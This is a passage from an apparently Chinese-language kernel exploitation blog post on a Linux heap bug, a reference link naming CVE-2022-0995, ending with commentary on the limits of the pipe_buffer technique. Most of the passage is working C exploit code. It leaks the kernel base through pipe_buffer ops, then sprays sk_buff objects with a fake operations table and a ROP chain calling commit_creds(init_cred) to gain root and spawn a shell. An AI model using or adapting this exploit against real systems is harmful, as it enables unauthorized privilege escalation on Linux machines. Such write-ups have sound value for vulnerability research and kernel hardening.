    uint64_t kernel_addr, kernel_offset, kernel_base;
    for (int i = 0; i < SOCKET_NUM; i++)
    {
        for (int j = 0; j < SK_BUFF_NUM; j++)
        {
            if (read(sk_sockets[i][1], &fake_secondary_msg,
                     sizeof(fake_secondary_msg)) < 0)
                errExit("failed to release sk_buff!");

            if (pipe_buf_ptr->ops > 0xffffffff81000000)
            {
                printf("\033[32m\033[1m[+] got pipe_buf_ops: \033[0m%p\n",
                       pipe_buf_ptr->ops);
                kernel_addr = (unsigned long *)(pipe_buf_ptr->ops);
                kernel_offset = (kernel_addr - 0xffffffff8203fe40);
                kernel_base = 0xffffffff81000000 + kernel_offset;
            }
        }
    }
    printf("\033[32m\033[1m[+] kernel base: \033[0m%p \033[32m\033[1moffset: \033[0m%p\n",
           kernel_base, kernel_offset);

    puts("\n\033[34m\033[1m[*] hijack the ops of pipe_buffer, gain root privilege\033[0m");

    unsigned long pop_rdi = 0xffffffff810938f0 + kernel_offset;
    unsigned long init_cred = 0xffffffff82c6d580 + kernel_offset;
    unsigned long commit_cred = 0xffffffff810d25c0 + kernel_offset;
    unsigned long swapgs_restore_regs_and_return_to_usermode = 0xffffffff81c00ff0 + kernel_offset;
    unsigned long push_rsi_pop_rsp_pop_4reg_ret = 0xffffffff812dbede + kernel_offset;

    pipe_buf_ptr->page = *(uint64_t *)"196082";
    pipe_buf_ptr->ops = victim_addr + 0x100;

    struct pipe_buf_operations *ops_ptr = (struct pipe_buf_operations *)&fake_secondary_msg[0x100];
    ops_ptr->release = push_rsi_pop_rsp_pop_4reg_ret;

    int rop = 0;
    unsigned long *rop_chain;

    rop_chain = (uint64_t *)&fake_secondary_msg[0x20];
    rop_chain[rop++] = pop_rdi;
    rop_chain[rop++] = init_cred;
    rop_chain[rop++] = commit_cred;
    rop_chain[rop++] = swapgs_restore_regs_and_return_to_usermode + 0x16;
    rop_chain[rop++] = 0;
    rop_chain[rop++] = 0;
    rop_chain[rop++] = get_shell;
    rop_chain[rop++] = user_cs;
    rop_chain[rop++] = user_rflags;
    rop_chain[rop++] = user_sp;
    rop_chain[rop++] = user_ss;

    for (int i = 0; i < SOCKET_NUM; i++)
    {
        for (int j = 0; j < SK_BUFF_NUM; j++)
        {
            if (write(sk_sockets[i][0], fake_secondary_msg, sizeof(fake_secondary_msg)) < 0)
            {
                errExit("failed to spray sk_buff!");
            }
        }
    }

    for (int i = 0; i < PIPE_NUM; i++)
    {
        close(pipe_fd[i][0]);
        close(pipe_fd[i][1]);
    }

    return 0;
}

pipe_buffer？

这里主要说的是向pipe_buffer说yes! 这篇文章中的利用手法。

不太推荐，不过需要修改一下type的值为0x306，如果继续保持0x30a的话结果是偏移0x400这样对于pipe_buffer来说过于大了，容易飞出去，所以修改到0x40效果更佳。(不过我不知道为什么每次申请的时候他都给我结尾为0x40和0xc0的，好像就是故意的🤮)

虽然我们可以达到上图，但是在后续的利用中会出现一些问题，首先就是pipe对于申请数量的限制，超过510个时就出现了报错，这样会使成功率大打折扣。其次就是这里是页级的UAF，正如前面的所说，申请的数量较少那么我们在后续对pipe修改size分配堆块的时候从刚刚释放的页面内分配的概率又进一步减小了。当然，面对第二个问题我们可以事先分配很多object用于消耗内存中的slab。但是第一个问题却是硬伤无法解决，所以就我看来如果遇到页级的off by one/null这样的漏洞需要事先配置好堆风水的情况以外都不是特别推荐使用这一方法。

参考链接:

https://arttnba3.cn/2022/04/06/CVE-0X08-CVE-2022-0995/

https://elixir.bootlin.com/linux/v5.17-rc3/source